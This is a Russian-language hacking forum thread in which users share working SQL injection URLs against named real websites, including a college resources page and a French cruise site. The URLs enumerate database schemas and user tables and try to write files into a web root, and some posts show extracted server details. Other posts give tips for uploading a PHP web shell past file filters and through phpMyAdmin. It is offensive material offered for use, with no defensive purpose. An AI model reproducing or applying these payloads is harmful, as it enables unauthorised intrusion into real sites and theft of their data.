В каком смысле поподробней? Я же дал рабочий пример, а дальше сам, пробел тока убери перед: %3C/script%3E
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+latin1),4,5,6,7,8+from+information_schema.columns+where+table_name=%27users%27/* не получается конкретизировать запрос под определенную бд. получается высвечивает колонки всех бд с такой таблицей статьи читаю, такого не нахожу
Code: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(column_name)),4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273/* тьфу, вопрос неправильно прочитал, сорри: Текущая БД: Code: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(database())),4,5,6,7,8/* БД, в которых есть табла users: Code: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(table_schema)),4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273/* все таблицы из конркетно текущей БД: Code: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(CONCAT_WS(0x3a,table_schema,table_name))),4,5,6,7,8+from+information_schema.tables+WHERE+table_schema=DATABASE()/*
Code: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(concat(column_name,0x3a,table_schema))),4,5,6,7,8+from+information_schema.columns+where+table_name='users'/*
Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.
... Узнаем путь в файле phpinfo.php =) http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-1'+union+select+1,2,3,'qw',5,6,7,8+from+mysql.user+into+outfile+'/d0/www/sites/www.mcli.dist.maricopa.edu/htdocs/images/d012.jpg'+--+ Oops Access denied for user 'mcliweb'@'%' (using password: YES) Т.ч. =( ...
Code: http://www.francecruises.com/river62+order+by+12---.html http://www.francecruises.com/river62+union+select+1,2,3,4,5,6,7,8,9,10,11,12---.html Хелп... PS: не надо про блинд... Мне нужно вывод сделать.
group+by+31: PHP: http://www.francecruises.com/hotel-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31---HotelSaintPaulParis.html [email protected]:5.0.51-log:francecruises_com_2
В админке инет шопа мона загружать изображения, гружу файл f.php а скрипт переименовывет его в 45s.jpg как этого избежать?
залей картинку и посмотри, передающиеся пакеты... потом зайлей *.php файл и сравни... //Если есть пасс, то попробуй приконектиться к phpmyadmin и ам залить шелл, попробуй к ftp/ssh
Krist_ALL, если хостинг плохой, то можно проверить еще через ReverseIP и пройтись по сторонним сайтам и там уже проинклюдить картинку
и что? к чему твой пост? ты мог бы там дать линк в ПМ, мог бы погуглить слова, что не понятны из моего или поста Снейка...
пробовать обойти фильтр, в идеале - изучить исходник. Подсказки: .php .PHP image.PHP image.jpg.php image.php3 image.php5 image.PHP3 image.PHP5 image.phtml image.PHTML Если нет - слушай нюка ЗЫЖ Хотя 100% еще есть варианты, в общем долго думать, упорствовать и не сдаваться ЗЗЫЫЖЖ где взять исходник? Изучать сорцы на главной, изучать сорцы админки и etc. Надеятся на тщеславие и жадность лошар всяких если есть phpinfo() - то обратить внимание, включены ли маджик квотс, если нет - то пробовать %00 если есть регистр глобалс он - пробавть переопределить сессию, особенно если она есть в адресной строке, но тут без LFI отдыхаем правда есть скуля и некоторые другие условия - то можено и пожжечь В обещем вариантов миллион и миллиард. Надо искать, главное пытаться
Люди,help. кароч нашол скуль версия 5,всё гуд. Как получить рута на машине. Я имею ввиду как залить шел через sql и как потом его запустить. блин я ламо. помогите плиз. может ссылки на статьи ачата есть какиенить